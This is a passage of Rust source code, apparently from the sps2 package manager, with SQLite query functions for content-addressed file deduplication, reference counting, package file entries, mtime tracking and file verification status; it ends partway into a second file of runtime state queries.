    tx: &mut Transaction<'_, Sqlite>,
    hash: &Hash,
    metadata: &FileMetadata,
) -> Result<DeduplicationResult, Error> {
    let hash_str = hash.to_hex();
    let now = chrono::Utc::now().timestamp();
    // Probe for an existing object with the same content hash.
    let existing = query("SELECT ref_count FROM cas_objects WHERE hash = ?1 AND kind = 'file'")
        .bind(&hash_str)
        .fetch_optional(&mut **tx)
        .await
        .map_err(|e| StateError::DatabaseError {
            message: format!("failed to check file object: {e}"),
        })?;
    if let Some(row) = existing {
        let current: i64 = row.get("ref_count");
        // Duplicate content: only refresh last_seen_at, refcount untouched.
        query("UPDATE cas_objects SET last_seen_at = ?2 WHERE hash = ?1 AND kind = 'file'")
            .bind(&hash_str)
            .bind(now)
            .execute(&mut **tx)
            .await
            .map_err(|e| StateError::DatabaseError {
                message: format!("failed to update file metadata: {e}"),
            })?;
        ensure_file_verification_row(tx, &hash_str).await?;
        // space_saved = full object size, since nothing new is stored.
        return Ok(DeduplicationResult {
            hash: hash.clone(),
            was_duplicate: true,
            ref_count: current,
            space_saved: metadata.size,
        });
    }
    // New content: insert with ref_count 0; created_at == last_seen_at (= ?3).
    query(
        r#"
        INSERT INTO cas_objects (
            hash, kind, size_bytes, created_at, ref_count,
            is_executable, is_symlink, symlink_target,
            last_seen_at
        ) VALUES (?1, 'file', ?2, ?3, 0, ?4, ?5, ?6, ?3)
        "#,
    )
    .bind(&hash_str)
    .bind(metadata.size)
    .bind(now)
    .bind(metadata.is_executable)
    .bind(metadata.is_symlink)
    .bind(&metadata.symlink_target)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to insert file object: {e}"),
    })?;
    ensure_file_verification_row(tx, &hash_str).await?;
    Ok(DeduplicationResult {
        hash: hash.clone(),
        was_duplicate: false,
        ref_count: 0,
        space_saved: 0,
    })
}
/// Helper to ensure a `file_verification` row exists for `hash_str`.
///
/// Idempotent: uses `INSERT OR IGNORE`, so an existing row (and its status /
/// attempt counters) is left untouched. New rows start in the `pending`
/// state with zero attempts.
async fn ensure_file_verification_row(
    tx: &mut Transaction<'_, Sqlite>,
    hash_str: &str,
) -> Result<(), Error> {
    query(
        r#"
        INSERT OR IGNORE INTO file_verification (file_hash, status, attempts, last_checked_at, last_error)
        VALUES (?1, 'pending', 0, NULL, NULL)
        "#,
    )
    .bind(hash_str)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to ensure verification row: {e}"),
    })?;
    Ok(())
}
/// Insert a package file entry for a `state_packages` row.
///
/// Resolves the `package_version_id` behind `package_id`, inserts the file
/// row (idempotently, via `INSERT OR IGNORE`), and returns the row id of the
/// `package_files` entry — whether newly inserted or pre-existing.
///
/// # Errors
///
/// Returns an error if the database operations fail or if the package ID is unknown.
pub async fn add_package_file_entry(
    tx: &mut Transaction<'_, Sqlite>,
    package_id: i64,
    file_ref: &FileReference,
) -> Result<i64, Error> {
    // Map the state-package row to its underlying package version.
    let pv_row = query("SELECT package_version_id AS id FROM state_packages WHERE id = ?1")
        .bind(package_id)
        .fetch_optional(&mut **tx)
        .await
        .map_err(|e| StateError::DatabaseError {
            message: format!("failed to resolve package version id: {e}"),
        })?;
    let Some(pv_id) = pv_row.map(|r| r.get::<i64, _>("id")) else {
        return Err(StateError::DatabaseError {
            message: format!("unknown state package id {package_id}"),
        }
        .into());
    };
    let hash_str = file_ref.hash.to_hex();
    // OR IGNORE keeps re-registration of the same (version, path) pair cheap.
    query(
        r#"
        INSERT OR IGNORE INTO package_files
            (package_version_id, file_hash, rel_path, mode, uid, gid, mtime)
        VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7)
        "#,
    )
    .bind(pv_id)
    .bind(&hash_str)
    .bind(&file_ref.relative_path)
    .bind(file_ref.metadata.permissions as i64)
    .bind(file_ref.metadata.uid as i64)
    .bind(file_ref.metadata.gid as i64)
    .bind(file_ref.metadata.mtime)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to insert package file entry: {e}"),
    })?;
    // Re-select to obtain the id even when the insert was ignored.
    let row = query(
        r#"
        SELECT id FROM package_files
        WHERE package_version_id = ?1 AND rel_path = ?2
        "#,
    )
    .bind(pv_id)
    .bind(&file_ref.relative_path)
    .fetch_one(&mut **tx)
    .await?;
    Ok(row.get("id"))
}
/// Decrement a file refcount and return the new value.
///
/// The UPDATE is a no-op for an unknown hash; in that case the follow-up
/// SELECT finds no row and 0 is returned. No floor is applied, so the
/// stored refcount can go negative — NOTE(review): callers appear to
/// reconcile via `set_file_object_ref_count`; confirm this is intended.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn decrement_file_object_ref(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &str,
) -> Result<i64, Error> {
    query("UPDATE cas_objects SET ref_count = ref_count - 1 WHERE hash = ?1 AND kind = 'file'")
        .bind(hash)
        .execute(&mut **tx)
        .await
        .map_err(|e| StateError::DatabaseError {
            message: format!("failed to decrement file refcount: {e}"),
        })?;
    let row = query("SELECT ref_count FROM cas_objects WHERE hash = ?1 AND kind = 'file'")
        .bind(hash)
        .fetch_optional(&mut **tx)
        .await
        .map_err(|e| StateError::DatabaseError {
            message: format!("failed to fetch file refcount: {e}"),
        })?;
    Ok(row.map(|r| r.get("ref_count")).unwrap_or(0))
}
/// Increment a file refcount and return the new value.
///
/// Also refreshes `last_seen_at` (SQLite `strftime('%s','now')`). Returns 0
/// when the hash has no file object row.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn increment_file_object_ref(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &str,
) -> Result<i64, Error> {
    query(
        "UPDATE cas_objects SET ref_count = ref_count + 1, last_seen_at = strftime('%s','now') WHERE hash = ?1 AND kind = 'file'",
    )
    .bind(hash)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to increment file refcount: {e}"),
    })?;
    let row = query("SELECT ref_count FROM cas_objects WHERE hash = ?1 AND kind = 'file'")
        .bind(hash)
        .fetch_optional(&mut **tx)
        .await
        .map_err(|e| StateError::DatabaseError {
            message: format!("failed to fetch file refcount: {e}"),
        })?;
    Ok(row.map(|r| r.get("ref_count")).unwrap_or(0))
}
/// Decrement all file refs for the given state package ID.
///
/// Every `package_files` row of the package produces one decrement, so a
/// hash referenced by several paths is decremented once per path. Returns
/// the number of decrements performed (i.e. the number of file rows).
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn decrement_file_object_refs_for_package(
    tx: &mut Transaction<'_, Sqlite>,
    package_id: i64,
) -> Result<usize, Error> {
    let rows = query(
        r#"
        SELECT pf.file_hash
        FROM state_packages sp
        JOIN package_files pf ON pf.package_version_id = sp.package_version_id
        WHERE sp.id = ?1
        "#,
    )
    .bind(package_id)
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to list package file hashes: {e}"),
    })?;
    let mut count = 0usize;
    for row in rows {
        let hash: String = row.get("file_hash");
        // New refcount value is not needed here, only the side effect.
        let _ = decrement_file_object_ref(tx, &hash).await?;
        count += 1;
    }
    Ok(count)
}
/// Force set a file object's refcount (reconciliation helper).
///
/// The `ref_count <> ?1` guard makes the write a no-op when the stored value
/// already matches, so the returned `rows_affected` (0 or 1) doubles as a
/// "was a correction needed" flag.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn set_file_object_ref_count(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &str,
    count: i64,
) -> Result<u64, Error> {
    let res = query(
        "UPDATE cas_objects SET ref_count = ?1 WHERE hash = ?2 AND kind = 'file' AND ref_count <> ?1",
    )
    .bind(count)
    .bind(hash)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to set file refcount: {e}"),
    })?;
    Ok(res.rows_affected())
}
/// Fetch a file object by content hash, or `None` if absent.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_file_object(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &Hash,
) -> Result<Option<FileObject>, Error> {
    let hash_str = hash.to_hex();
    let row = query(
        r#"
        SELECT hash, size_bytes AS size, created_at, ref_count,
               is_executable, is_symlink, symlink_target
        FROM cas_objects
        WHERE hash = ?1 AND kind = 'file'
        "#,
    )
    .bind(&hash_str)
    .fetch_optional(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to fetch file object: {e}"),
    })?;
    // Column names match the FileObject fields via the AS aliases above.
    Ok(row.map(|r| FileObject {
        hash: r.get("hash"),
        size: r.get("size"),
        created_at: r.get("created_at"),
        ref_count: r.get("ref_count"),
        is_executable: r.get("is_executable"),
        is_symlink: r.get("is_symlink"),
        symlink_target: r.get("symlink_target"),
    }))
}
/// Fetch all file objects (every `cas_objects` row of kind 'file'),
/// regardless of refcount.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_all_file_objects(
    tx: &mut Transaction<'_, Sqlite>,
) -> Result<Vec<FileObject>, Error> {
    let rows = query(
        r#"
        SELECT hash, size_bytes AS size, created_at, ref_count,
               is_executable, is_symlink, symlink_target
        FROM cas_objects
        WHERE kind = 'file'
        "#,
    )
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to list file objects: {e}"),
    })?;
    Ok(rows
        .into_iter()
        .map(|r| FileObject {
            hash: r.get("hash"),
            size: r.get("size"),
            created_at: r.get("created_at"),
            ref_count: r.get("ref_count"),
            is_executable: r.get("is_executable"),
            is_symlink: r.get("is_symlink"),
            symlink_target: r.get("symlink_target"),
        })
        .collect())
}
/// Build a map from file hash to the newest `created_at` of any state that
/// references it (0 when the referencing states have no timestamp).
///
/// Used to decide how "fresh" a CAS object's references are, e.g. during
/// garbage collection.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_file_last_ref_map(
    tx: &mut Transaction<'_, Sqlite>,
) -> Result<HashMap<String, i64>, Error> {
    let rows = query(
        r#"
        SELECT pf.file_hash AS hash, COALESCE(MAX(s.created_at), 0) AS last_ref
        FROM package_files pf
        JOIN state_packages sp ON sp.package_version_id = pf.package_version_id
        JOIN states s ON s.id = sp.state_id
        GROUP BY pf.file_hash
        "#,
    )
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to build file last-ref map: {e}"),
    })?;
    // GROUP BY guarantees one row per hash, so collecting the (hash, last_ref)
    // pairs directly into the map is lossless.
    Ok(rows
        .into_iter()
        .map(|r| (r.get("hash"), r.get("last_ref")))
        .collect())
}
/// Fetch file entries for a state package ID, ordered by relative path.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_file_entries(
    tx: &mut Transaction<'_, Sqlite>,
    package_id: i64,
) -> Result<Vec<PackageFileEntry>, Error> {
    let rows = query(
        r#"
        SELECT
            pf.id,
            sp.id AS package_id,
            pf.file_hash,
            pf.rel_path AS relative_path,
            pf.mode AS permissions,
            pf.uid,
            pf.gid,
            pf.mtime
        FROM state_packages sp
        JOIN package_files pf ON pf.package_version_id = sp.package_version_id
        WHERE sp.id = ?1
        ORDER BY pf.rel_path
        "#,
    )
    .bind(package_id)
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to list package file entries: {e}"),
    })?;
    Ok(rows
        .into_iter()
        .map(|r| PackageFileEntry {
            id: r.get("id"),
            package_id: r.get("package_id"),
            file_hash: r.get("file_hash"),
            relative_path: r.get("relative_path"),
            permissions: r.get("permissions"),
            uid: r.get("uid"),
            gid: r.get("gid"),
            mtime: r.get("mtime"),
        })
        .collect())
}
/// Fetch `(rel_path, package_name, package_version)` tuples for every
/// distinct file entry sharing the given hash ("which packages own this
/// content?").
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_file_entries_by_hash(
    tx: &mut Transaction<'_, Sqlite>,
    file_hash: &str,
) -> Result<Vec<(String, String, String)>, Error> {
    let rows = query(
        r#"
        SELECT DISTINCT
            pf.rel_path,
            pv.name AS package_name,
            pv.version AS package_version
        FROM package_files pf
        JOIN package_versions pv ON pv.id = pf.package_version_id
        WHERE pf.file_hash = ?1
        ORDER BY pf.rel_path
        "#,
    )
    .bind(file_hash)
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to get entries by hash: {e}"),
    })?;
    Ok(rows
        .into_iter()
        .map(|r| {
            (
                r.get("rel_path"),
                r.get("package_name"),
                r.get("package_version"),
            )
        })
        .collect())
}
/// Update (or insert) an mtime tracker entry for `file_path`.
///
/// Upsert keyed on `file_path`: a new row records both timestamps; an
/// existing row gets `last_verified_mtime` and `updated_at` refreshed while
/// keeping its original `created_at`.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn update_file_mtime(
    tx: &mut Transaction<'_, Sqlite>,
    file_path: &str,
    verified_mtime: i64,
) -> Result<(), Error> {
    query(
        r#"
        INSERT INTO file_mtime_tracker (file_path, last_verified_mtime, created_at, updated_at)
        VALUES (?1, ?2, strftime('%s','now'), strftime('%s','now'))
        ON CONFLICT(file_path) DO UPDATE SET
            last_verified_mtime = excluded.last_verified_mtime,
            updated_at = strftime('%s','now')
        "#,
    )
    .bind(file_path)
    .bind(verified_mtime)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to update mtime tracker: {e}"),
    })?;
    Ok(())
}
/// Fetch package file entries for a state + name + version.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_file_entries_by_name(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &uuid::Uuid,
    package_name: &str,
    package_version: &str,
) -> Result<Vec<PackageFileEntry>, Error> {
    let rows = query(
        r#"
        SELECT
            pf.id,
            sp.id AS package_id,
            pf.file_hash,
            pf.rel_path AS relative_path,
            pf.mode AS permissions,
            pf.uid,
            pf.gid,
            pf.mtime
        FROM state_packages sp
        JOIN package_versions pv ON pv.id = sp.package_version_id
        JOIN package_files pf ON pf.package_version_id = pv.id
        WHERE sp.state_id = ?1 AND pv.name = ?2 AND pv.version = ?3
        ORDER BY pf.rel_path
        "#,
    )
    .bind(state_id.to_string())
    .bind(package_name)
    .bind(package_version)
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to fetch package file entries by name: {e}"),
    })?;
    Ok(rows
        .into_iter()
        .map(|r| PackageFileEntry {
            id: r.get("id"),
            package_id: r.get("package_id"),
            file_hash: r.get("file_hash"),
            relative_path: r.get("relative_path"),
            permissions: r.get("permissions"),
            uid: r.get("uid"),
            gid: r.get("gid"),
            mtime: r.get("mtime"),
        })
        .collect())
}
/// Fetch package file entries across all states for name/version.
///
/// `package_id` is filled with the most recently added `state_packages` row
/// referencing the version (0 when no state references it at all).
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_file_entries_all_states(
    tx: &mut Transaction<'_, Sqlite>,
    package_name: &str,
    package_version: &str,
) -> Result<Vec<PackageFileEntry>, Error> {
    let rows = query(
        r#"
        SELECT
            pf.id,
            COALESCE((
                SELECT sp.id
                FROM state_packages sp
                WHERE sp.package_version_id = pv.id
                ORDER BY sp.added_at DESC
                LIMIT 1
            ), 0) AS package_id,
            pf.file_hash,
            pf.rel_path AS relative_path,
            pf.mode AS permissions,
            pf.uid,
            pf.gid,
            pf.mtime
        FROM package_versions pv
        JOIN package_files pf ON pf.package_version_id = pv.id
        WHERE pv.name = ?1 AND pv.version = ?2
        ORDER BY pf.rel_path
        "#,
    )
    .bind(package_name)
    .bind(package_version)
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to fetch package file entries across states: {e}"),
    })?;
    Ok(rows
        .into_iter()
        .map(|r| PackageFileEntry {
            id: r.get("id"),
            package_id: r.get("package_id"),
            file_hash: r.get("file_hash"),
            relative_path: r.get("relative_path"),
            permissions: r.get("permissions"),
            uid: r.get("uid"),
            gid: r.get("gid"),
            mtime: r.get("mtime"),
        })
        .collect())
}
/// Fetch a file mtime tracker row for `file_path`, or `None` if untracked.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_file_mtime(
    tx: &mut Transaction<'_, Sqlite>,
    file_path: &str,
) -> Result<Option<FileMTimeTracker>, Error> {
    let row = query(
        r#"
        SELECT file_path, last_verified_mtime
        FROM file_mtime_tracker
        WHERE file_path = ?1
        "#,
    )
    .bind(file_path)
    .fetch_optional(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to fetch file mtime tracker: {e}"),
    })?;
    Ok(row.map(|r| FileMTimeTracker {
        file_path: r.get("file_path"),
        last_verified_mtime: r.get("last_verified_mtime"),
    }))
}
/// Legacy: mark package file hashed (no-op under schema v2).
///
/// Kept only so schema-v1 call sites keep compiling; always succeeds.
///
/// # Errors
///
/// This function does not return an error.
pub async fn mark_package_file_hashed(
    _tx: &mut Transaction<'_, Sqlite>,
    _package_id: i64,
    _computed_hash: &Hash,
) -> Result<(), Error> {
    Ok(())
}
/// Fetch mtime trackers whose paths belong to the given package
/// name/version.
///
/// NOTE(review): the join matches `file_mtime_tracker.file_path` against
/// `package_files.rel_path`, i.e. both are assumed to use the same
/// (relative) path convention — confirm against the code that writes the
/// tracker rows.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_package_file_mtimes(
    tx: &mut Transaction<'_, Sqlite>,
    package_name: &str,
    package_version: &str,
) -> Result<Vec<FileMTimeTracker>, Error> {
    let rows = query(
        r#"
        SELECT DISTINCT fmt.file_path, fmt.last_verified_mtime
        FROM file_mtime_tracker fmt
        JOIN package_files pf ON pf.rel_path = fmt.file_path
        JOIN package_versions pv ON pv.id = pf.package_version_id
        WHERE pv.name = ?1 AND pv.version = ?2
        ORDER BY fmt.file_path
        "#,
    )
    .bind(package_name)
    .bind(package_version)
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to fetch package file mtime trackers: {e}"),
    })?;
    Ok(rows
        .into_iter()
        .map(|r| FileMTimeTracker {
            file_path: r.get("file_path"),
            last_verified_mtime: r.get("last_verified_mtime"),
        })
        .collect())
}
/// Clear mtime trackers for a package name/version; returns the number of
/// deleted rows.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn clear_package_mtime_trackers(
    tx: &mut Transaction<'_, Sqlite>,
    package_name: &str,
    package_version: &str,
) -> Result<u64, Error> {
    let result = query(
        r#"
        DELETE FROM file_mtime_tracker
        WHERE file_path IN (
            SELECT DISTINCT pf.rel_path
            FROM package_files pf
            JOIN package_versions pv ON pv.id = pf.package_version_id
            WHERE pv.name = ?1 AND pv.version = ?2
        )
        "#,
    )
    .bind(package_name)
    .bind(package_version)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to clear mtime trackers: {e}"),
    })?;
    Ok(result.rows_affected())
}
/// Remove stale mtime trackers older than `max_age_seconds`; returns the
/// number of deleted rows.
///
/// "Age" is measured from the row's `updated_at`, so a tracker refreshed by
/// a recent verification survives.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn clear_old_mtime_trackers(
    tx: &mut Transaction<'_, Sqlite>,
    max_age_seconds: i64,
) -> Result<u64, Error> {
    let cutoff = chrono::Utc::now().timestamp() - max_age_seconds;
    let res = query("DELETE FROM file_mtime_tracker WHERE updated_at < ?1")
        .bind(cutoff)
        .execute(&mut **tx)
        .await
        .map_err(|e| StateError::DatabaseError {
            message: format!("failed to clear old mtime trackers: {e}"),
        })?;
    Ok(res.rows_affected())
}
/// Fetch live file objects that need (re-)verification, up to `limit`.
///
/// Candidates are referenced file objects (`ref_count > 0`) that are either
/// unknown to `file_verification`, still `pending`, `verified` but last
/// checked before the age cutoff, or `failed` with attempts remaining.
/// Results are ordered failed-first, then pending, then stalest-verified,
/// so retries and fresh objects are handled before routine re-checks.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_objects_needing_verification(
    tx: &mut Transaction<'_, Sqlite>,
    max_age_seconds: i64,
    max_attempts: i32,
    limit: i64,
) -> Result<Vec<FileObject>, Error> {
    let cutoff = chrono::Utc::now().timestamp() - max_age_seconds;
    let rows = query(
        r#"
        SELECT co.hash,
               co.size_bytes AS size,
               co.created_at,
               co.ref_count,
               co.is_executable,
               co.is_symlink,
               co.symlink_target
        FROM cas_objects co
        LEFT JOIN file_verification fv ON fv.file_hash = co.hash
        WHERE co.kind = 'file' AND co.ref_count > 0
          AND (
            fv.file_hash IS NULL OR
            fv.status = 'pending' OR
            (fv.status = 'verified' AND (fv.last_checked_at IS NULL OR fv.last_checked_at < ?1)) OR
            (fv.status = 'failed' AND fv.attempts < ?2)
          )
        ORDER BY
          CASE COALESCE(fv.status, 'pending')
            WHEN 'failed' THEN 1
            WHEN 'pending' THEN 2
            WHEN 'verified' THEN 3
            ELSE 4
          END,
          COALESCE(fv.last_checked_at, 0) ASC
        LIMIT ?3
        "#,
    )
    .bind(cutoff)
    .bind(max_attempts)
    .bind(limit)
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to fetch verification candidates: {e}"),
    })?;
    Ok(rows
        .into_iter()
        .map(|r| FileObject {
            hash: r.get("hash"),
            size: r.get("size"),
            created_at: r.get("created_at"),
            ref_count: r.get("ref_count"),
            is_executable: r.get("is_executable"),
            is_symlink: r.get("is_symlink"),
            symlink_target: r.get("symlink_target"),
        })
        .collect())
}
/// Record the outcome of a verification attempt for a hash.
///
/// Upsert: a first attempt inserts with `attempts = 1`; later attempts
/// overwrite status/error/timestamp and increment the attempt counter.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn update_verification_status(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &Hash,
    status: &str,
    error_message: Option<&str>,
) -> Result<(), Error> {
    let hash_str = hash.to_hex();
    let now = chrono::Utc::now().timestamp();
    query(
        r#"
        INSERT INTO file_verification (file_hash, status, attempts, last_checked_at, last_error)
        VALUES (?1, ?2, 1, ?3, ?4)
        ON CONFLICT(file_hash) DO UPDATE SET
            status = excluded.status,
            last_error = excluded.last_error,
            last_checked_at = excluded.last_checked_at,
            attempts = file_verification.attempts + 1
        "#,
    )
    .bind(&hash_str)
    .bind(status)
    .bind(now)
    .bind(error_message)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to update verification status: {e}"),
    })?;
    Ok(())
}
/// Aggregate verification stats for live (referenced) file objects.
///
/// Returns `(total, verified, pending, failed, quarantined)`; objects with
/// no `file_verification` row count as `pending`.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_verification_stats(
    tx: &mut Transaction<'_, Sqlite>,
) -> Result<(i64, i64, i64, i64, i64), Error> {
    let row = query(
        r#"
        SELECT
            COUNT(*) AS total_objects,
            SUM(CASE WHEN COALESCE(fv.status, 'pending') = 'verified' THEN 1 ELSE 0 END) AS verified_count,
            SUM(CASE WHEN COALESCE(fv.status, 'pending') = 'pending' THEN 1 ELSE 0 END) AS pending_count,
            SUM(CASE WHEN COALESCE(fv.status, 'pending') = 'failed' THEN 1 ELSE 0 END) AS failed_count,
            SUM(CASE WHEN COALESCE(fv.status, 'pending') = 'quarantined' THEN 1 ELSE 0 END) AS quarantined_count
        FROM cas_objects co
        LEFT JOIN file_verification fv ON fv.file_hash = co.hash
        WHERE co.kind = 'file' AND co.ref_count > 0
        "#,
    )
    .fetch_one(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to compute verification stats: {e}"),
    })?;
    Ok((
        row.get("total_objects"),
        row.get("verified_count"),
        row.get("pending_count"),
        row.get("failed_count"),
        row.get("quarantined_count"),
    ))
}
/// Fetch failed verification objects up to `limit`, as
/// `(hash, last_error, attempts)` tuples.
///
/// Only live objects (`ref_count > 0`) are reported; most-retried and
/// most-recently-checked failures come first.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_failed_verification_objects(
    tx: &mut Transaction<'_, Sqlite>,
    limit: i64,
) -> Result<Vec<(String, String, i32)>, Error> {
    let rows = query(
        r#"
        SELECT fv.file_hash AS hash,
               COALESCE(fv.last_error, 'unknown error') AS verification_error,
               fv.attempts AS verification_attempts
        FROM file_verification fv
        JOIN cas_objects co ON co.hash = fv.file_hash
        WHERE fv.status = 'failed' AND co.kind = 'file' AND co.ref_count > 0
        ORDER BY fv.attempts DESC, COALESCE(fv.last_checked_at, 0) DESC
        LIMIT ?1
        "#,
    )
    .bind(limit)
    .fetch_all(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to fetch failed verification objects: {e}"),
    })?;
    Ok(rows
        .into_iter()
        .map(|r| {
            (
                r.get("hash"),
                r.get("verification_error"),
                r.get("verification_attempts"),
            )
        })
        .collect())
}
/// Quarantine a file object, recording `reason` as the last error.
///
/// NOTE(review): unlike `update_verification_status`, the conflict branch
/// does not bump `attempts` — quarantining an already-tracked object leaves
/// its attempt count unchanged. Confirm this asymmetry is intentional.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn quarantine_file_object(
    tx: &mut Transaction<'_, Sqlite>,
    hash: &Hash,
    reason: &str,
) -> Result<(), Error> {
    let hash_str = hash.to_hex();
    let now = chrono::Utc::now().timestamp();
    query(
        r#"
        INSERT INTO file_verification (file_hash, status, attempts, last_checked_at, last_error)
        VALUES (?1, 'quarantined', 1, ?2, ?3)
        ON CONFLICT(file_hash) DO UPDATE SET
            status = 'quarantined',
            last_error = excluded.last_error,
            last_checked_at = excluded.last_checked_at
        "#,
    )
    .bind(&hash_str)
    .bind(now)
    .bind(reason)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("failed to quarantine file object: {e}"),
    })?;
    Ok(())
}
/// Verify a file object against the store and record the outcome.
///
/// Delegates the actual content check to
/// `FileStore::verify_file_detailed`, then maps each outcome to a
/// `file_verification` status update. Returns `true` only for
/// `FileVerificationResult::Valid`.
///
/// # Errors
///
/// Returns an error if the database operations or file store operations fail.
pub async fn verify_file_with_tracking(
    tx: &mut Transaction<'_, Sqlite>,
    file_store: &sps2_store::FileStore,
    hash: &Hash,
) -> Result<bool, Error> {
    use sps2_store::FileVerificationResult;
    match file_store.verify_file_detailed(hash).await? {
        FileVerificationResult::Valid => {
            update_verification_status(tx, hash, "verified", None).await?;
            Ok(true)
        }
        FileVerificationResult::Missing => {
            update_verification_status(tx, hash, "failed", Some("file missing from store")).await?;
            Ok(false)
        }
        FileVerificationResult::HashMismatch { expected, actual } => {
            // Record both hashes so the operator can diagnose corruption.
            let msg = format!(
                "hash mismatch: expected {}, got {}",
                expected.to_hex(),
                actual.to_hex()
            );
            update_verification_status(tx, hash, "failed", Some(&msg)).await?;
            Ok(false)
        }
        FileVerificationResult::Error { message } => {
            let msg = format!("verification error: {message}");
            update_verification_status(tx, hash, "failed", Some(&msg)).await?;
            Ok(false)
        }
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/queries_runtime.rs | crates/state/src/queries_runtime.rs | //! Runtime SQL queries for state operations (schema v2)
use crate::models::{Package, State, StoreRef};
use sps2_errors::{Error, StateError};
use sps2_types::StateId;
use sqlx::{query, Row, Sqlite, Transaction};
use std::collections::HashMap;
use std::convert::TryFrom;
/// Get the current active state (the singleton `active_state` row, id 1).
///
/// # Errors
///
/// Returns an error if the database operation fails, if no active state is
/// set (`StateError::ActiveStateMissing`), or if the stored ID is not a
/// valid UUID.
pub async fn get_active_state(tx: &mut Transaction<'_, Sqlite>) -> Result<StateId, Error> {
    let row = query("SELECT state_id FROM active_state WHERE id = 1")
        .fetch_optional(&mut **tx)
        .await?;
    match row {
        Some(r) => {
            let state_id: String = r.get("state_id");
            let id = uuid::Uuid::parse_str(&state_id)
                .map_err(|e| Error::internal(format!("invalid state ID: {e}")))?;
            Ok(id)
        }
        None => Err(StateError::ActiveStateMissing.into()),
    }
}
/// Set the active state pointer (replaces the singleton row, id 1).
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn set_active_state(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &StateId,
) -> Result<(), Error> {
    let id_str = state_id.to_string();
    let now = chrono::Utc::now().timestamp();
    query("INSERT OR REPLACE INTO active_state (id, state_id, updated_at) VALUES (1, ?1, ?2)")
        .bind(id_str)
        .bind(now)
        .execute(&mut **tx)
        .await?;
    Ok(())
}
/// Insert a new state row, marked successful from the start.
///
/// `parent` is the state this one was derived from (None for the root
/// state); `operation` is a free-form description (e.g. "install").
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn create_state(
    tx: &mut Transaction<'_, Sqlite>,
    id: &StateId,
    parent: Option<&StateId>,
    operation: &str,
) -> Result<(), Error> {
    let id_str = id.to_string();
    let parent_str = parent.map(ToString::to_string);
    let now = chrono::Utc::now().timestamp();
    query(
        "INSERT INTO states (id, parent_id, created_at, operation, success) VALUES (?1, ?2, ?3, ?4, 1)",
    )
    .bind(id_str)
    .bind(parent_str)
    .bind(now)
    .bind(operation)
    .execute(&mut **tx)
    .await?;
    Ok(())
}
/// Get packages present in a particular state snapshot, ordered by name.
///
/// `venv_path` is always `None` here — NOTE(review): presumably populated
/// by a different query or layer; confirm against callers.
///
/// # Errors
///
/// Returns an error if the database operation fails.
pub async fn get_state_packages(
    tx: &mut Transaction<'_, Sqlite>,
    state_id: &StateId,
) -> Result<Vec<Package>, Error> {
